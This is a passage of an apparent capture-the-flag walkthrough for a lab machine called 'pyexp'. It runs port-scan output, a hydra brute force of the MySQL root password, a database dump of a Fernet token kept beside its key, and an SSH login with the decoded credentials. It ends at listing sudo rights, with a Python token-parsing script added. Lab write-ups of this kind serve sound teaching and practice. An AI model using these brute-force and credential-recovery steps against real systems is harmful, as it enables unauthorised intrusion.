PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f7:af:6c:d1:26:94:dc:e5:1a:22:1a:64:4e:1c:34:a9 (RSA)
| 256 46:d2:8d:bd:2f:9e:af:ce:e2:45:5c:a6:12:c0:d9:19 (ECDSA)
|_ 256 8d:11:ed:ff:7d:c5:a7:24:99:22:7f:ce:29:88:b2:4a (ED25519)
3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
| Thread ID: 41
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, FoundRows, Speaks41ProtocolOld, ODBCClient, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsCompression, IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: u$N<"6&[zuY@rA,UHL"a
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 3306 is MySQL. With nothing else to go on, we brute-force the root password:
┌──(kali㉿VirtualBox)-[~]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.125.118 -t 64
This turns up the password prettywoman.
With the password in hand, we log in to the database remotely:
┌──(kali㉿VirtualBox)-[~]
└─$ mysql -u root -h 192.168.125.118 -p
Enter password: prettywoman
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 901
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| data |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
MariaDB [(none)]> use data;
Database changed
MariaDB [data]> show tables;
+----------------+
| Tables_in_data |
+----------------+
| fernet |
+----------------+
MariaDB [data]> select * from fernet;
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred | keyy |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
The data database holds a single table, fernet, with two columns: cred, a Fernet token, and keyy, the key that goes with it:
gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=
Decoding the token with its key at https://asecuritysite.com/encryption/ferdecode gives:
lucy:wJ9`"Lemdv9[FEw-
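For reference, this is what the site above is working on: a Fernet token is version || timestamp || IV || AES-128-CBC ciphertext || HMAC-SHA256 tag, and the 32-byte key splits into a signing half and an encryption half. The script below is an added example, not part of the original writeup; it parses the recovered token with the standard library, checks its tag against the stored key, and shows how a tag is computed. Storing the key in the same row as the ciphertext is why the token offers no protection here.

```python
import base64
import hashlib
import hmac
import struct
from datetime import datetime, timezone

# The cred and keyy values recovered from the fernet table above.
TOKEN = "gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys="
KEY = "UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0="

HEADER = 1 + 8 + 16   # version byte, big-endian timestamp, AES-CBC IV
TAG = 32              # trailing HMAC-SHA256 over everything before it


def parse_token(token):
    """Split a token into version || timestamp || IV || ciphertext || tag."""
    raw = base64.urlsafe_b64decode(token)
    if len(raw) < HEADER + TAG or raw[0] != 0x80:
        raise ValueError("not a Fernet token")
    (ts,) = struct.unpack(">Q", raw[1:9])
    return {
        "version": raw[0],
        "timestamp": ts,
        "issued": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
        "iv": raw[9:HEADER],
        "ciphertext": raw[HEADER:-TAG],
        "tag": raw[-TAG:],
    }


def verify_token(token, key):
    """Recompute the tag with the signing half (first 16 bytes) of the key."""
    raw = base64.urlsafe_b64decode(token)
    signing_key = base64.urlsafe_b64decode(key)[:16]
    expected = hmac.new(signing_key, raw[:-TAG], hashlib.sha256).digest()
    return hmac.compare_digest(expected, raw[-TAG:])


def sign_token(key, timestamp, iv, ciphertext):
    """Assemble and sign a token body from constructed parts (no encryption here)."""
    body = b"\x80" + struct.pack(">Q", timestamp) + iv + ciphertext
    signing_key = base64.urlsafe_b64decode(key)[:16]
    tag = hmac.new(signing_key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()


if __name__ == "__main__":
    fields = parse_token(TOKEN)
    print("issued:", fields["issued"], "ciphertext bytes:", len(fields["ciphertext"]))
    print("tag verifies with stored key:", verify_token(TOKEN, KEY))
```

The token's timestamp is 10 August 2020, matching the dates on /opt below; the actual plaintext needs AES-128-CBC with the key's second half, which is what `cryptography.fernet.Fernet(key).decrypt(token)` does.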
These look like SSH credentials, so let's SSH in as lucy, specifying port 1337:
┌──(kali㉿VirtualBox)-[~]
└─$ ssh lucy@192.168.125.118 -p 1337
lucy@192.168.125.118's password: wJ9`"Lemdv9[FEw-
lucy@pyexp:~$ cat local.txt
d256137a530979e5ccdbf2777c8292b5
lucy@pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lucy may run the following commands on pyexp:
(root) NOPASSWD: /usr/bin/python2 /opt/exp.py
We can run /usr/bin/python2 /opt/exp.py as root; however, /opt/exp.py itself is owned by root, so we can't simply edit it.
lucy@pyexp:~$ cd /opt/
lucy@pyexp:/opt$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Aug 10 2020 .
drwxr-xr-x 18 root root 4096 Oct 19 2020 ..
-rw-r--r-- 1 root root 49 Aug 10 2020 exp.py
Let's see what is inside /opt/exp.py: